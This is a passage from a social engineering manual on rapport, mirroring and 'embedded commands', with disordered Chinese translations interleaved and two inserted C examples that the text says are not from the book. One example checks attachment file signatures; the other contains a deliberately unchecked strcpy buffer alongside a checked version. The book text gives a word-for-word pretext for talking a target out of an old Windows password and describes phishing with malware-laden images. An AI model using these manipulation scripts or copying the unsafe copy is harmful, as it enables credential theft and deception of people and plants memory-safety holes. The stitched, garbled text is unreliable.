As mentioned before, when the 9/11 attacks happened in New York City, many people claimed to have lost family or friends in the attacks. That made people empathize, and therefore these “victims” were given money, fame, or whatever they were seeking.

As a social engineering auditor, you must be able to have a broad range of emotions that you can tap. Being closed in your emotions makes being empathetic very hard. This point goes along with really liking people. If you do, you won’t have a hard time getting to know them and their stories and empathizing with them.

Be Well Rounded in Your General Knowledge

Knowledge is power. You don’t have to know everything about everything, but having some knowledge about some things is a good idea. It makes you interesting and gives you something to base a conversation on.

Knowledge is power. The old hacker mantra comes back to you as a social engineer. A social engineer should be a reader and a studier. If you fill your head with knowledge then you will have something to talk about when you approach a target. Don’t neglect reading, researching, and studying about the topic of the target’s occupation or hobbies. Your goal is not to be a “know-it-all” and become an expert on every topic, but rather to have enough knowledge that you don’t look at the target with a blank stare when she asks, “Did you bring an RJ-45 connector with you to fix the server’s network connection issues?”

Develop Your Curious Side

People normally feel a little self-righteous when it comes to their beliefs or thoughts on the way things should be done. That self-righteousness or judgmental attitude can change the way a person reacts to something being said. Even if you don’t say anything you may start to think it, which can show in your body language or facial expressions. Instead of being self-righteous, develop a curiosity about how other people think and do things. Being curious keeps you from making rash judgments. This can be applied by being humble enough to ask for help or ask for more information. Be open minded enough to look into and accept another’s thoughts on a topic, even if those thoughts differ from yours.

Curiosity did not kill the social engineer. This point doesn’t change much from a non–social engineer perspective. When you become curious about others’ lifestyles, cultures, and languages you begin to understand what makes people tick. Being curious also keeps you from being rigid and unbending in your personal judgments. You may not personally agree with certain topics, beliefs, or actions but if you can remain curious and nonjudgmental then you can approach a person by trying to understand why he is, acts, or portrays a certain way, instead of judging him.

Find Ways to Meet People’s Needs

This point is the pinnacle of the list and is one of the most powerful points in this book. Dr. William Glasser wrote a book called Choice Theory in which he identified four fundamental psychological needs for humans:


  • Belonging/connecting/love
  • Power/significance/competence
  • Freedom/responsibility
  • Fun/learning

The principle behind this point is that creating ways for people to get these needs met by conversing with you builds instant rapport. If you can create an environment to provide those needs for people, you can create bonds that are unbreakable.

Let me tell you a brief story about how powerful meeting people’s needs can be. I was in a minor car accident. A young driver pulled out in front of me and then decided to stop. I had a split second to decide between hitting him going 55 mph or veering off away from him then launching my car over a small ditch into the side of a mountain. I chose in a second to not kill the three young people in the car. My car went airborne until it was stopped by solid rock. I watched my beautiful little customized Jetta crumple under the weight, and my face smacked off the windshield. I barely nicked the other driver’s rear bumper but I was moving fast enough that his car was sideways in the highway. When I was able to get my bearings we called the cops and an ambulance.

The young man had a different insurance company than I did. The next morning I got a call from his agent, who politely asked me questions. He told me that an adjuster would come out to see my now-crumpled Jetta, and within 48 hours I was handed a check and a letter stating they would cover all medical costs for my recovery.

I was then given a follow-up call from his insurance agent to see whether I was okay. How many calls from my insurance company do you think I got? I got one, just to tell me how to answer questions.

I understand that caring about each person is not the job of these large companies. But the other agent called me just to see whether I was okay. I fought no battles to get paid and I was given a very fair price for my car.

Two days after that I cancelled my insurance and went to see Eric, the insurance agent who called me, from the young man’s company. I told him I was so impressed that I wanted what he was selling. It has been 12 years now and I use Eric for every insurance need I have. About two years ago I got a call from an insurance company offering me rates that were substantially lower than what Eric and his company offer. I couldn’t even think about doing that to Eric. Why? Rapport—plain and simple. Eric is my friend, my helper, someone I can call about questions on insurance, and someone who will always give me the best advice. He cares, he knows my family, and he never tries to hard-sell me. He doesn’t have to, because I will buy whatever he has, because I trust him.

 

这就是融洽的力量。我不知道,也许埃里克关心我的目的是让我转到他的保险公司,尽管我对此表示怀疑。了解他后,我知道他确实关心我,任何认识他的人都这么说。他和他兄弟经营着一家稳固的公司。融洽可以建立超越成本或损失的人际关系。

This is the power of rapport. I don’t know, maybe Eric’s end game in checking on me was to get me to move to his insurance practice, although I doubt it. Knowing him, he actually cares and anyone who knows him says the same thing. His brother and he run a solid business. Rapport can create bonds between people that transcend cost or loss.

 

满足对方的需求可以大大增加建立融洽关系的机会。不要表现出有目的性,要真心实意地提供帮助,结果会让人惊喜。对于社会工程师来说,也许没有比满足这些需求更有价值了。学习如何创造一个让目标感到舒适并满足四个基本需求之一的环境是确保建立牢不可破的融洽关系的可靠方法。

Filling a need for the person you are talking to drastically increases the chances of building rapport. Do it without appearing to have an end game, do it with a genuine desire to help, and be amazed at the results. Perhaps no other avenue is more valuable for social engineers than being able to meet these needs. Learning how to create an environment that allows the target to feel comfortable and get one of the basic four fundamental needs met is a sure way to ensure unbreakable rapport.

 

间谍经常使用这种满足需求或欲望的原则。我最近去南美洲的一个国家旅行时,有人告诉我,该国政府一直在通过满足“联系或爱”的基本需求来渗透。一个美丽的女人会被派去勾引一个男人,但这不是一夜情。她会勾引他几天、几周、几个月甚至几年。随着时间的推移,她会越来越大胆地要求他们亲密的地方,最终进入他的办公室,在那里她可以访问植物虫、特洛伊木马或克隆驱动器。这种方法很具破坏性,但很有效。

Spies use this principle of filling a need or desire often. In a recent trip to a South American country I was told that its government is infiltrated all the time via fulfilling the basic need of “connecting or love.” A beautiful woman will be sent to seduce a man, but this is no one-night stand. She will seduce him for days, weeks, months, or even years. As time continues she will get bolder with her requests for where they are intimate, eventually making their way to his office, where she gains access to plant bugs, Trojans, or clone drives. This method is devastating, but it works.

 

社会工程师也会通过钓鱼邮件满足用户的需求。在一次测试中,一家声誉极高的公司的 125 名员工收到了假图片文件,这些图片文件被标记为 BritneyNaked.jpg、MileyCyrusShowering.jpg 和其他类似名称,每张图片都编码了恶意代码,让社会工程师能够访问用户的计算机。结果显示,超过 75% 的图片被点击。结果发现,图片中提到的明星越年轻,点击率就越高。

Social engineers fill desires through phishing emails also. In one test 125 employees of a very reputable company were sent fake image files labeled BritneyNaked.jpg, MileyCyrusShowering.jpg, and other such names, and each image was encoded with malicious code that would give the social engineer access on the user’s computer. The results were that more than 75 percent of the images were clicked. What was found was the younger the star mentioned in the picture, the higher the click ratio.
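One check a defender can put in front of attachments like the ones in that test, as an added example that is not from the book: a file whose name claims to be a picture is only treated as a picture when its first bytes carry an image signature. The signatures used are the public magic numbers for JPEG, PNG, GIF, Windows PE and ELF files; the function names, the file names and the byte samples are constructed for this example.

```c
/* Added example, not from the book: a content-vs-name check for mail
 * attachments. A file whose name claims to be a picture is only treated as a
 * picture when its first bytes carry an image signature. The signatures are
 * the public magic numbers for JPEG, PNG, GIF, Windows PE and ELF files; the
 * file names and byte samples below are constructed for this example. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum content_type { CT_UNKNOWN, CT_JPEG, CT_PNG, CT_GIF, CT_PE, CT_ELF };

/* Classify a buffer by its leading bytes (magic numbers). */
enum content_type classify_content(const unsigned char *buf, size_t n)
{
    static const unsigned char png_sig[8] = {0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};
    if (n >= 3 && buf[0] == 0xFF && buf[1] == 0xD8 && buf[2] == 0xFF)
        return CT_JPEG;                      /* JPEG SOI marker FF D8 FF */
    if (n >= 8 && memcmp(buf, png_sig, 8) == 0)
        return CT_PNG;
    if (n >= 6 && (memcmp(buf, "GIF87a", 6) == 0 || memcmp(buf, "GIF89a", 6) == 0))
        return CT_GIF;
    if (n >= 4 && buf[0] == 0x7F && memcmp(buf + 1, "ELF", 3) == 0)
        return CT_ELF;                       /* Linux/Unix executable */
    if (n >= 2 && buf[0] == 'M' && buf[1] == 'Z')
        return CT_PE;                        /* Windows executable (MZ header) */
    return CT_UNKNOWN;
}

/* Case-insensitive test that name ends with ext, e.g. has_ext("a.JPG", ".jpg"). */
static int has_ext(const char *name, const char *ext)
{
    size_t ln = strlen(name), le = strlen(ext);
    if (le > ln)
        return 0;
    const char *tail = name + ln - le;
    for (size_t i = 0; i < le; i++)
        if (tolower((unsigned char)tail[i]) != tolower((unsigned char)ext[i]))
            return 0;
    return 1;
}

/* What the file name claims to be, judged by its extension only. */
enum content_type claimed_type(const char *name)
{
    if (has_ext(name, ".jpg") || has_ext(name, ".jpeg"))
        return CT_JPEG;
    if (has_ext(name, ".png"))
        return CT_PNG;
    if (has_ext(name, ".gif"))
        return CT_GIF;
    return CT_UNKNOWN;
}

/* Returns 1 when the attachment should be flagged: the name claims an image
 * type but the bytes are something else (an executable, or no known image).
 * Names that do not claim an image type are outside this check and return 0. */
int attachment_suspicious(const char *name, const unsigned char *buf, size_t n)
{
    enum content_type claimed = claimed_type(name);
    if (claimed == CT_UNKNOWN)
        return 0;
    return classify_content(buf, n) != claimed;
}

/* Constructed samples: a JPEG/JFIF header and the start of a PE executable. */
const unsigned char SAMPLE_JPEG[] = {0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 'J', 'F', 'I', 'F', 0x00};
const unsigned char SAMPLE_PE[]   = {'M', 'Z', 0x90, 0x00, 0x03, 0x00, 0x00, 0x00};

int main(void)
{
    printf("photo.jpg with JPEG bytes suspicious? %d\n",
           attachment_suspicious("photo.jpg", SAMPLE_JPEG, sizeof SAMPLE_JPEG));
    printf("photo.jpg with PE bytes suspicious?   %d\n",
           attachment_suspicious("photo.jpg", SAMPLE_PE, sizeof SAMPLE_PE));
    return 0;
}
```

This catches an executable renamed to look like a picture, which is the common shape of the lure described above. It does not catch a genuine image file that carries an exploit for a vulnerable image viewer, so it belongs alongside patching and sandboxing of the viewer, not in place of them.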

 

These disgusting and devastating facts show how well fulfilling people’s desires can work. In person, too, it is no different. Police interrogators use this tactic for building rapport all the time.

One time I interviewed a law enforcement agent for a podcast I did at social-engineer.org (www.social-engineer.org/framework/Podcast/001_-_Interrogation_and_Interview_Tactics). The guest told a story that proves this point about the power of rapport to make people comply with requests. The officers had arrested a man who was a peeping tom. He had a fetish where he loved to invade the privacy of women who wore pink cowboy boots. The agent, instead of judging him for the freak he is, used phrases like, “I like the red ones myself,” and “I saw this girl the other day wearing short shorts and high cowboy boots, wow!”

After just a short time he began to relax. Why? He was among like-minded people. He felt connected, part of the crowd. Their comments put him at ease and he began to spill his guts about his “habits.”

The preceding is a nice example of how to develop and build rapport, but how can you use it as a social engineer?

You can build rapport in a matter of seconds by applying the principles of building rapport discussed earlier. To prove this, imagine you need to grab some cash, you don’t have your ATM card on you, and you forgot your account number, so you have to go in and ask someone for some help. Maybe you feel a little embarrassed about having to ask for your account number. You walk into a local branch of your bank you have never been into. No one is in the bank and you have your choice of tellers. Maybe you don’t think about it, most people don’t, but you will look over all the open lanes and choose the person who makes you feel the most comfortable. You will get the same results from each lane, but you will choose the one that makes you feel okay.

Maybe you choose the most attractive person, or the one with the biggest smile, or the one who greets you first—whomever you choose and however you choose them, you make the choice either consciously or unconsciously, but a lot of it has to do with rapport. The same principle will prove true when it comes to you and your target. As you walk up to a target she will make instantaneous snap judgments of you based on your personal appearance, demeanor, facial expressions, and, of course, her mood. Most of these factors you can control, so take pre-emptive action on them to ensure success.

Building rapport properly creates a bond like strong glue that can withstand minor inconvenience and even some misunderstanding.

Rapport allows a person to say and do things that only close friends can do, because he or she is brought into that inner circle of trust. It is a powerful force without which salespeople, friendships, employment, and many other situations are much more difficult.

Remember Chapter 4 on pretexting? You learned that pretexting is more than just playing a part; it is living, being, and becoming the person you are portraying to the target. Having a strong pretext is imperative to building the right kind of rapport. In many social engineering engagements you will not have the time to build a storyline and use long-term seduction or rapport techniques, so your success will be based on many of the non-verbal things you will need to do.

Using Other Rapport-Building Techniques

Other rapport-building techniques exist that are based in NLP research. As you now know, rapport is basically connecting with someone and putting him or her at ease; some NLP techniques used by hypnotists and NLP practitioners can put people at ease instantly, as discussed next.

Breathing at the Same Rate as Your Target

Breathing at the same rate as someone doesn’t mean you closely listen to every breath and try to breathe in and out when your target does. But some people have very defined breathing patterns: Some have fast and short breathing, and some have long and deep breathing. Notice how the target breathes and mirror that pattern, but without parroting (that is, doing it at the same exact time).

Matching Your Target’s Vocal Tone and Speech Pattern

I was born in New York and raised in an Italian family. I talk fast, loud, and with my hands. In addition to being 75 percent Italian, I am 25 percent Hungarian. I am big, tall, and loud and gesture like a professional sign language translator on speed. If I approach a timid, shy, slow-talking southerner I can kill rapport if I do not slow down, put the hands away, and change my communication style. Listen to your target’s vocal tone and match yours to his, whether he is a slow, fast, loud, quiet, or soft speaker. As for accents, a good rule is: Don’t try. Unless you can do it very well don’t even attempt it. A poorly done accent is a rapport killer.

Along these same lines, you can also try to listen for key phrases. People use terms like “okie dokie” or “yepper.” Listen for any key phrases, and if they are there, you might be able to work them into a sentence.

Once I was talking with a target who would say things like, “It’s six of one and half dozen of another.” I don’t use that phrase a lot and didn’t want to screw it up, because that would create a lack of rapport. Instead, I would mix in some of the key words of that phrase and say things like, “I must have done that a half dozen times.”

How someone talks is also an area where you should restrict your personal judgments. Some people are close talkers, some are whisperers, some are touchers—if you are not, you need to allow a person freedom to talk the way he or she is comfortable and then mirror it.

Matching Your Target’s Body Language

Matching body language is a very interesting avenue of rapport building, mainly because it can create very strong bonds, but at the same time a mismatch can kill all your rapport in a matter of seconds.

If you notice someone standing a certain way, maybe with both arms crossed, don’t assume she is shutting you out—maybe she’s just cold. Can you cross one arm across your body to mirror her stance, or fold your hands into a steeple?

When sitting across from someone who is eating a meal you can take a few sips from your drink while he eats to mirror him. Don’t do everything he does, but make similar actions.

People like people who are like themselves. That is just human nature. It makes them feel comfortable. Bill Phillips was the genius behind the Body-for-Life program that changed the way workout programs were developed. He promoted something that was heavily tied to the mirroring principle. If you are fat and you only hang out with fat people, the chance of your changing is slim to none. Why? The answer is that you are comfortable with being fat and with people who are also comfortable with it. If you want to change, then hang out with skinny people and a mental change will quickly happen.

This principle is the same in social engineering. You don’t want your targets to make a change, so you need to be like them. You want them to feel good with you.

Testing Rapport

Using these alternative rapport-building techniques as well as matching energy levels, facial expressions, and the like can build strong rapport on a subliminal level.

After trying some of these tactics you can test your rapport by making a movement, like scratching your head or rubbing your ear, and if in the next minute or two you see your target make a similar movement, you probably have developed some strong rapport.

These techniques can work wonders in many parts of your life when developing, building, and starting relationships with others. Learning how to use the psychological principles included in this chapter can make a huge difference in your social engineering practice.

For years, there has been a myth that the human mind can be overwritten like a program. Is it just a myth? Can the human mind be mastered?

The next section reveals some of the most mind-blowing information in this book.

The Human Buffer Overflow

A glass can only hold so much liquid. If you have an 8-ounce glass and you try to pour 10 ounces of liquid into it, what will happen? It will overflow and spill all over the place. If you try to force the container to hold more liquid than it is meant to, you can eventually break the glass due to pressure.

Computer programs work in a similar manner. Imagine you have a small program that has only one purpose and two fields: User Name and Password.

When the program opens you see a little screen where you type admin in the User Name field and password in the Password field. A little box appears that says “OK,” signifying all is good.

The developer allocated a certain amount of memory space for the User Name field, enough to hold the word admin a couple of times. What happens if you put 20 A’s in that field and click OK?

The program crashes and gives you an error message. Why? The input entered is longer than the allocated space, and without proper error handling (a check on the input’s length before it is copied into that space) the program throws an exception and crashes.

The goal of software hackers is to find the address that the program will jump to after the crash and overwrite it so that it points at malicious code they control. By controlling the execution flow the hacker can tell the program to “execute” any program he desires. He can inject commands of any type into the memory space of that program because he now controls it. As a penetration tester few things are more exciting than seeing a program execute commands you tell it to.

The human mind runs “software,” and over the years you build instruction sets, buffers, and memory lengths into your “software package.”

Before applying this to the human mind, definitions of a few technical terms are necessary. A buffer is an area of space that is given for something to happen or to hold data. As in the simplistic glass-of-water example, the password field is given a buffer, which is the number of characters that it is allowed to have. If more characters than the buffer allows are entered, the programmer needs to tell the program what to do with the oversized data set.

If he doesn’t, the computer crashes and your program shuts down. Often what happens in the background is the program didn’t know what to do with all the data, so it overflowed the allocated space, crashed the program, and exited. Hence the term buffer overflow.

The human mind works in a similar way. Space is allocated for certain datasets. If a certain dataset does not fit the space we have for it, what happens? Unlike a computer, your brain doesn’t crash, but it does open up a momentary gap that allows for a command to be injected so the brain can be told what to do with the extra data.

A human buffer overflow is basically the same principle. The goal is to identify a running “program” and insert codes into that program that will allow you to inject commands and in essence control the movement of thought in a certain direction.

To test this concept, take a look at a very simplistic example (see Figure 5-15).

Because the picture in this book is black and white, I have put a color copy up on the website at www.social-engineer.org/resources/book/HumanBufferOverflow1.jpg.

Here is the gist. Open that URL, and then as fast as you can try to read the color of the word, not what the word spells.

Figure 5-15: Human buffer overflow experiment 1.

This game is not as easy as it looks. If you successfully get through it, then try to do the exercise faster and faster. What will happen to most, if not all, of us is that at least once you will read the word and not the color, or find yourself struggling through it.

Why do we have such a hard time with this exercise? It is because of injected commands. Our brains want to read the words, not the colors. It is the way the human mind is wired. Our brain sees the color but it reacts to the word being spelled first. Therefore, the thought in our minds is the word, not the color. This exercise shows that having “code” execute in the human brain that might be the opposite of what the person is thinking or seeing is possible.

Setting the Ground Rules

In a paper entitled “Modification of Audible and Visual Speech” (www.prometheus-inc.com/asi/multimedia1998/papers/covell.pdf) researchers Michele Covell, Malcolm Slaney, Christoph Bregler, and Margaret Withgott state that scientists have proven that people speak 150 words per minute but think at 500–600 words per minute. This means that most people you talk to can jump around your conversations in their heads. So overflowing the brain through fast speech seems almost impossible.

You must also understand how people make decisions in life. People make most of their decisions subconsciously, including how to drive to work, get coffee, brush their teeth, and what clothes to wear, without really thinking about it.

Have you ever driven all the way to work and when you get there, you can’t remember what billboards you passed, what route you took, or that traffic accident on the news? You were in a state of mind where your subconscious took over and did what you always do without you consciously thinking about every turn.

Most decisions people make are like this. Some scientists even believe people make decisions up to seven seconds earlier in their subconscious before making them in the real world. When people finally do make a decision consciously they do it from more than just what they hear—sight, feelings, and emotions become involved in the decision.

Understanding how humans work and think can be the quickest way to creating a buffer overflow, or an overflow of the natural programs of the human mind, so you can inject commands.

Fuzzing the Human OS

In actual software hacking, a method called fuzzing is used to find the memory-handling errors that let data overwrite what it should not and give control to a malicious hacker. Fuzzing is where the hacker throws random data at the program in differing lengths to see what makes it crash because it cannot handle the data. That crash gives the hacker a path to inject malicious code.
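The User Name field from the walkthrough above and the fuzzing loop described here, in C, as an added example that is not from the book. The field size (16 bytes), the function names and the inputs are assumptions made for this illustration. The unchecked setter shows the defect the text describes, the checked setter is the error handling it says is missing, and the fuzz loop feeds inputs of growing length to the checked setter to find where the field's limit lies, which is what a fuzzer's crash reports reveal about an unchecked one.

```c
/* Added example, not from the book: a fixed-size User Name field with the
 * bounds check missing (the defect described above) and with it present,
 * plus a small deterministic fuzz loop that finds the field's limit. The
 * field size, function names and inputs are assumptions for this example. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define USER_FIELD_CAP 16   /* assumed: room for "admin" a couple of times */

struct login_form {
    char user[USER_FIELD_CAP];
};

/* Unchecked copy: the defect the text describes. strcpy() stops only at the
 * terminating NUL, so any input of USER_FIELD_CAP or more characters writes
 * past the end of the field into whatever memory follows it. Shown for
 * contrast only; nothing in this program calls it. */
void set_user_unchecked(struct login_form *f, const char *input)
{
    strcpy(f->user, input);   /* no length check: overflow on long input */
}

/* Checked copy: the error handling the text says is missing. Returns 0 when
 * the input (with its terminator) fits, -1 when it does not. On -1 the field
 * is cleared rather than silently truncated, so a caller cannot mistake a
 * partial name for a complete one. */
int set_user_checked(struct login_form *f, const char *input)
{
    size_t n = strlen(input);
    if (n >= sizeof f->user) {
        f->user[0] = '\0';
        return -1;
    }
    memcpy(f->user, input, n + 1);   /* n + 1 copies the terminator too */
    return 0;
}

/* Convenience wrapper: does this input fit the field? 0 = yes, -1 = no. */
int user_fits(const char *input)
{
    struct login_form f;
    return set_user_checked(&f, input);
}

/* Deterministic "fuzz" loop in the spirit of the fuzzing passage: feed the
 * checked setter runs of 'A' of length 1..max_len and report the first length
 * it rejects, which is the field's real limit. Returns -1 if every length fit. */
int fuzz_user_field(size_t max_len)
{
    char buf[256];
    struct login_form f;
    for (size_t len = 1; len <= max_len && len < sizeof buf; len++) {
        memset(buf, 'A', len);   /* the "20 A's" style of input from the text */
        buf[len] = '\0';
        if (set_user_checked(&f, buf) != 0)
            return (int)len;
    }
    return -1;
}

int main(void)
{
    /* 20 A's, written as two groups of ten to make the count obvious */
    const char *twenty_as = "AAAAAAAAAA" "AAAAAAAAAA";
    printf("\"admin\" fits: %s\n", user_fits("admin") == 0 ? "yes" : "no");
    printf("20 A's fit:   %s\n", user_fits(twenty_as) == 0 ? "yes" : "no");
    printf("first rejected length: %d\n", fuzz_user_field(64));
    return 0;
}
```

With the check in place the 20-character input produces an error return instead of a crash, which is the whole difference between the two behaviours the text contrasts. The fuzz loop stops at length 16 for this field; against the unchecked version the same growing inputs would be the ones that start corrupting neighbouring memory.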

 

Just like fuzzing a program, you must understand how the human mind reacts to certain types of data. Presenting people with different sets of decisions or different sets of data, then seeing how they react, can tell us the “programs” they are running. Certain laws in the human mind seem to be inherent, and everyone follows them.

For example, if you approach a building with two sets of doors (one outer and one inner) and you hold the first set open for a complete stranger, what do you think he will do next? He will either hold the next set open for you or make sure that set stays open until you get inside.

If you are in a line of merging traffic and you let a complete stranger merge in front of you, most likely if you needed to merge later on he would let you in without even thinking. Why?

The reason has to do with the law of expectations, which states that people usually comply with an expectation. Decisions are usually made based on what that person feels the requestor expects him or her to do. One way you can start sending your malicious “data” to the brain program is called presupposition.

By giving the target something first, the request you make next will be “expected” to be followed. A simple example for you to test is with the doors. Hold a door for someone and most likely that person will at least make an attempt to ensure the next set of doors is open for you. A social engineer can do this by first giving the target a compliment or a piece of information they deem valuable, before the request is made. Giving that over first creates in them the need to comply with a future request, as it is expected.

Presupposition can be described best via an example:

“Did you know my next door neighbor, Ralph, always drives a green Ford Escort?”

In this sentence you presuppose:

  • I know my neighbor.
  • His name is Ralph.
  • He has a driver’s license.
  • He drives a green car.

To use presupposition effectively you ask a question using words, body language, and a facial expression that indicate what you are asking is already accepted. The basic gist of this method is to bypass the “firewall” (the conscious mind) and gain access directly to the “root of the system” (the subconscious). The quickest way to inject your own “code” is through embedded commands, discussed next.

嵌入式命令的规则

The Rules of Embedded Commands

 

嵌入式命令的一些基本原理使其发挥作用:

Some basic principles of embedded commands make them work:

 
 
     
  • 通常命令很短:三到四个词。
  • Usually the commands are short: three to four words.
  •  
     
  • 需要稍微强调一下才能使其有效。
  • Slight emphasis is needed to make them effective.
  •  
     
  • 将它们隐藏在普通句子中是最有效的用法。
  • Hiding them in normal sentences is the most effective use.
  •  
     
  • 你的面部语言和肢体语言必须支持这些命令。
  • Your facial and body language must support the commands.
  •  
 

嵌入式命令在营销中很受欢迎,例如:

Embedded commands are popular in marketing with things like:

 
 
     
  • “立即购买!”
  • “Buy now!”
  •  
     
  • “现在就采取行动!”
  • “Act now!”
  •  
     
  • “跟我来!”
  • “Follow me!”
  •  
 

在实际的缓冲区溢出中,漏洞利用编写者会使用填充,这是一种添加一些字符的方法,这些字符不会中断执行,但会提供一个不错的“着陆垫”,从而引导恶意代码。社交工程师可以利用类似填充的短语,帮助下一个命令在注入时有一个柔软的着陆点,例如:

In a real buffer overflow, exploit writers use padding, which is a method of adding some characters that do not interrupt the execution but allow a nice little “landing pad” that leads to the malicious code. Social engineers can utilize phrases that are like padding, to help the next command have a soft place to land when it is injected, such as:

 
 
     
  • “当你…”
  • “When you…”
  •  
     
  • “当你…的时候你感觉怎么样?”
  • “How do you feel when you…”
  •  
     
  • “一个人可以…”
  • “A person can…”
  •  
     
  • “正如你……”
  • “As you…”
  •  
 

所有这些语句都会产生一种情感或想法,让您可以将代码注入潜意识中。

All of these statements create an emotion or a thought that allows you to inject code into the subconscious.

 

嵌入式命令的示例有很多,但这里仅举几个例子供大家思考:

Many examples of embedded commands exist, but here are a few to ponder:

 
 
     
  • 使用引语或故事:大脑处理故事的方式往往不同于处理其他信息。一些有史以来最伟大的老师——亚里士多德、柏拉图、加马列尔、耶稣——都使用故事和插图来教导听众。为什么呢?
  • Using quotes or stories: The brain tends to process stories differently than other information. Some of the greatest teachers who have ever lived—Aristotle, Plato, Gamaliel, Jesus—all used stories and illustrations to teach those listening to them. Why?
  •  
 

潜意识将故事视为直接指令。NLP 之父之一班德勒 (Bandler) 教导 NLP 从业者需要学会使用引语。他知道故事或引语的力量会让演讲者掌控听众的想法。阅读引语、使用引语,然后将命令嵌入引语中,可以有效利用这一技巧。

The unconscious mind processes stories as direct instructions. Bandler, one of the fathers of NLP, taught that NLP practioners need to learn to use quotes. He knew the power of stories or quotes would give the speaker power over the thinking of his listeners. Reading quotes, using quotes, and then embedding commands into quotes can be a powerful use of this technique.

 

例如,有一次我需要操纵目标给我一个旧密码,这样我就可以将其“更改”为更安全的密码。我的借口是支持代表,他们自动质问为什么需要更改旧密码。我使用了类似这样的话:“Xavier Research Inc. 最近的一项研究表明,74% 的人在美国公司使用弱密码。这就是我们启动一项计划来更改全公司密码的原因。我将为您执行密码更改;我需要您给我您的旧 Windows 密码,然后我现在进行更改。”通过引用研究机构,我关于为什么必须进行这种更改的说法更有说服力。
 
     
  • 使用否定:否定很像逆反心理学。通过告诉目标不要做太多事情,您可以将命令嵌入句子中。例如,如果我告诉您“不要花太多时间练习使用嵌入命令”,我可以将命令“练习使用嵌入命令”插入我的句子中。我还可以假设您在一定程度上练习它,如果您很固执,您可能会说,“你不能告诉我该做什么,我会随心所欲地练习。”
  •  
 

For example, in one situation I needed to manipulate a target to give me an old password so I could “change” it to a more secure password. My pretext was a support rep and they automatically questioned why there was a need to change old passwords. I used something like, “A recent study by Xavier Research Inc. stated that 74% of the people use weak passwords in corporate America. That is the reason we launched a program to change the passwords corporate-wide. I will perform that password change for you; I need for you to give me your old Windows password and then I will make that change now.” By quoting a research facility it added weight to my words about why this change had to occur.
 
     
  • Using negation: Negation is much like reverse psychology. By telling the target to not do something too much, you can embed a command into the sentence. For example, if I tell you “Don’t spend too much time practicing the use of embedded commands,” I can slip the command “practice the use of embedded commands” into my sentence. I also can presuppose that you will practice it to some extent, and if you are stubborn you might say, “You can’t tell me what to do, I will practice all I want.”
  •  
 

 

告诉一个人某件事不重要或不相关,会使他的潜意识格外注意,这样他就能判断这件事是否相关。你可以在否定句中嵌入命令,就像前面的例子一样,这样听者就别无选择,只能采取行动。
 
     
  • 强迫听者发挥想象力:这种方法很有效,当你用“发生了什么……”或“当……时你感觉如何”等短语向听者提问时,听者必须想象一些东西来回答。如果你问“当你变得富有和出名时会发生什么?”听者必须在内心想象自己变得富有和出名的那一刻,才能回答这个问题。如果我问你“当你掌握了嵌入式命令的使用时会发生什么?”我强迫你想象成为一名大师,以及当这种情况发生时你会有何感受。这样想想:如果我告诉你“不要想象一头红牛”,你必须先想象一头红牛来告诉自己不要去想它。你的潜意识负责将一组命令中的每个单词解释成它可以代表的东西,然后赋予其意义。
  •  
 

Telling a person that something is not important or relevant makes his unconscious pay extra attention so he can determine whether it is relevant or not. You can embed commands in negative sentences like the earlier example that will leave the listener no option but to take action.
 
     
  • Forcing the listener to use his imagination: This method works when you ask the listener a question, using phrases such as “What happens…” or “How do you feel when…,” for which he must imagine something to answer it. If you ask, “What happens when you become rich and famous?” The listener has to internally imagine the time he might be rich and famous to answer that question. If I ask you, “What happens when you master the use of embedded commands?” I am forcing you to imagine becoming a master and how you will feel when that happens. Think of it this way: If I tell you, “Do not imagine a red cow,” you have to picture a red cow first to tell yourself to not think about it. Your unconscious mind is responsible for interpreting each word in a set of commands into something it can represent and then give meaning to.
  •  
 

 
 

当你的大脑理解这句话时,你的潜意识已经想象了它。潜意识直接处理语句,而不考虑上下文。另一个好处是,潜意识可以跟踪肢体语言、面部表情、语调和手势,然后将它们与所说的信息联系起来。可以说,在连接点的过程中,如果存在嵌入的命令,潜意识别无选择,只能服从。

By the time your brain has understood the sentence, your unconscious has imagined it. The unconscious mind processes statements directly, with no regard to the context. The other great part is that the unconscious can track body language, facial expressions, voice tones, and gestures, and then connect each of them to the message being spoken. While it is connecting the dots, so to speak, the unconscious mind has little option but to comply if an embedded command exists.

 
 

使用嵌入命令时,重要的是不要弄乱你的语调。如果你过分强调单词,那么你听起来会很奇怪,会吓跑对方,而不是嵌入命令。与软件缓冲区溢出一样,信息必须与你试图溢出的命令相匹配。

What’s important when using embedded commands is to not mess up your tones. If you overemphasize the words then you will sound odd and scare the person off instead of embed commands. As with a software buffer overflow, the information must match the command you are trying to overflow.

 

Summary

As you probably have already imagined, embedding commands is a vast field with a lot of room for error. You must practice to be very successful at it. Although I do not promote using this information for seduction, some decent videos exist about seduction that show how embedded commands can work.

 

Using these principles can create an environment where the target is very receptive to your suggestions.

Just because you tell the person, “You will purchase from me” does not mean he always will. So why use these commands?

It creates a platform to make social engineering easier. Using these types of commands is also a good lesson for companies you work with, to educate them about what to look for and how to spot someone who may be trying to use this type of social engineering tactic against them.

If you were to write out this principle of embedded commands as an equation, you could write it this way:

Human Buffer Overflow = Law of Expectations + Mental Padding + Embedded Codes.

 

Start a conversation with a target using phrases, body language, and assumptive speech. Presume the things you ask for are already as good as accomplished.

Next, pad the human mind with some statements that make embedding commands easier, while at the same time embedding the command. In essence, this is the equation for the human buffer overflow. Use this equation sparingly, but practice a lot before you attempt it. Try it at work or at home. Pick a target at work who might not normally comply with simple requests and see whether you can get him to serve you coffee: “Tom, I see you are heading to the kitchen, will you get me a cup of coffee with two creams please?”

Escalate your commands to larger tasks to see how far you can get. Try to use this equation to get commitment from people. Eventually, use this equation to see how much information you can get and how many commands you can inject.

This chapter covered some of the deepest and most amazing psychology principles in social engineering. This chapter alone can change your life, as well as your ability as a social engineer. Understanding how people think, why they think a certain way, and how to change their thoughts is a powerful aspect of being a social engineer. Next on the docket: how to influence your target.

 

Chapter 6

Influence: The Power of Persuasion

If you would persuade, you must appeal to interest rather than intellect.

—Benjamin Franklin

 

The epigraph sums up this entire chapter. You might be wondering why I didn’t include this within Chapter 5’s discussion of the psychological principles of social engineering. Psychology is a science, and a set of rules exists within it that, if followed, will yield a result. Social engineering psychology is scientific and calculated.

Influence and persuasion are much like art that is backed up by science. Persuasion and influence involve emotions and beliefs. As discussed in some of the earlier chapters, you have to know how and what people are thinking.

